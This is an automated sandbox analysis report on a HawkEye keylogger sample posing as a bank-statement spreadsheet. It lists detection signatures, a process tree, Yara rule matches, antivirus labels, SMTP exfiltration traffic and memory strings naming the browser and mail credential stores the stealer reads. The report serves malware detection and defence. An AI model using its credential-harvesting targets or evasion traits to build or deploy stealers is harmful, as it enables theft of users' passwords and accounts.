Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report BANK-STATMENT _xlsx.exe

Overview

General Information

Sample Name:BANK-STATMENT _xlsx.exe
Analysis ID:320625
MD5:debe564cd4c27c02d23c828df27fe27f
SHA1:1b55fba242460cc0a5b38299acaaacf3f54c5e87
SHA256:edafe7e62738e180cb882d93f37d2d306627aef482d6f7a7a06c69198c61cd58
Tags:exeHawkEye

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • BANK-STATMENT _xlsx.exe (PID: 1496 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' MD5: DEBE564CD4C27C02D23C828DF27FE27F)
    • BANK-STATMENT _xlsx.exe (PID: 4500 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' MD5: DEBE564CD4C27C02D23C828DF27FE27F)
      • dw20.exe (PID: 5996 cmdline: dw20.exe -x -s 2264 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 7044 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • BANK-STATMENT _xlsx.exe (PID: 3984 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
      • BANK-STATMENT _xlsx.exe (PID: 1900 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
        • BANK-STATMENT _xlsx.exe (PID: 4240 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
          • dw20.exe (PID: 5456 cmdline: dw20.exe -x -s 2304 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • BANK-STATMENT _xlsx.exe (PID: 6452 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4240 5772140 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
          • BANK-STATMENT _xlsx.exe (PID: 3028 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
            • BANK-STATMENT _xlsx.exe (PID: 1548 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
              • dw20.exe (PID: 5992 cmdline: dw20.exe -x -s 2288 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
              • vbc.exe (PID: 5676 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
              • vbc.exe (PID: 6708 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
            • BANK-STATMENT _xlsx.exe (PID: 2240 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 1548 5785125 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
              • BANK-STATMENT _xlsx.exe (PID: 6984 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                • BANK-STATMENT _xlsx.exe (PID: 6180 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                  • dw20.exe (PID: 5484 cmdline: dw20.exe -x -s 2264 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                • BANK-STATMENT _xlsx.exe (PID: 6188 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                  • BANK-STATMENT _xlsx.exe (PID: 5540 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                    • BANK-STATMENT _xlsx.exe (PID: 5580 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                      • dw20.exe (PID: 6904 cmdline: dw20.exe -x -s 2324 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                    • BANK-STATMENT _xlsx.exe (PID: 5588 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                      • BANK-STATMENT _xlsx.exe (PID: 6176 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                        • BANK-STATMENT _xlsx.exe (PID: 2864 cmdline: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe MD5: DEBE564CD4C27C02D23C828DF27FE27F)
                        • BANK-STATMENT _xlsx.exe (PID: 4608 cmdline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578 MD5: DEBE564CD4C27C02D23C828DF27FE27F)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["Mail PassView", "mailpv"], "Version": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
    00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
    • 0x2674:$hawkstr1: HawkEye Keylogger
    • 0x20ec:$hawkstr2: Dear HawkEye Customers!
    • 0x221e:$hawkstr3: HawkEye Logger Details:
    00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
    • 0x7b984:$key: HawkEyeKeylogger
    • 0x7dbb4:$salt: 099u787978786
    • 0x7bfc5:$string1: HawkEye_Keylogger
    • 0x7ce04:$string1: HawkEye_Keylogger
    • 0x7db14:$string1: HawkEye_Keylogger
    • 0x7c39a:$string2: holdermail.txt
    • 0x7c3ba:$string2: holdermail.txt
    • 0x7c2dc:$string3: wallet.dat
    • 0x7c2f4:$string3: wallet.dat
    • 0x7c30a:$string3: wallet.dat
    • 0x7d6d8:$string4: Keylog Records
    • 0x7d9f0:$string4: Keylog Records
    • 0x7dc0c:$string5: do not script -->
    • 0x7b96c:$string6: \pidloc.txt
    • 0x7b9fa:$string7: BSPLIT
    • 0x7ba0a:$string7: BSPLIT
    00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
        Click to see the 280 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        25.2.vbc.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          7.2.vbc.exe.400000.0.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
            • 0x7b89c:$key: HawkEyeKeylogger
            • 0x7dacc:$salt: 099u787978786
            • 0x7bedd:$string1: HawkEye_Keylogger
            • 0x7cd1c:$string1: HawkEye_Keylogger
            • 0x7da2c:$string1: HawkEye_Keylogger
            • 0x7c2b2:$string2: holdermail.txt
            • 0x7c2d2:$string2: holdermail.txt
            • 0x7c1f4:$string3: wallet.dat
            • 0x7c20c:$string3: wallet.dat
            • 0x7c222:$string3: wallet.dat
            • 0x7d5f0:$string4: Keylog Records
            • 0x7d908:$string4: Keylog Records
            • 0x7db24:$string5: do not script -->
            • 0x7b884:$string6: \pidloc.txt
            • 0x7b912:$string7: BSPLIT
            • 0x7b922:$string7: BSPLIT
            1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpackJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
                Click to see the 216 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: vbc.exe.6920.6.memstrMalware Configuration Extractor: HawkEye {"Modules": ["Mail PassView", "mailpv"], "Version": ""}
                Multi AV Scanner detection for submitted fileShow sources
                Source: BANK-STATMENT _xlsx.exeVirustotal: Detection: 40%Perma Link
                Source: BANK-STATMENT _xlsx.exeReversingLabs: Detection: 41%
                Machine Learning detection for sampleShow sources
                Source: BANK-STATMENT _xlsx.exeJoe Sandbox ML: detected
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: [autorun]
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00408900 FindFirstFileA,GetLastError,0_2_00408900
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AC0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00408900 FindFirstFileA,GetLastError,2_2_00408900
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AC0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00406EC3
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,7_2_00408441
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,7_2_00407E0E

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49746 -> 166.62.27.57:587
                May check the online IP address of the machineShow sources
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: unknownDNS query: name: whatismyipaddress.com
                Source: global trafficTCP traffic: 192.168.2.4:49746 -> 166.62.27.57:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.16.154.36 104.16.154.36
                Source: global trafficTCP traffic: 192.168.2.4:49746 -> 166.62.27.57:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
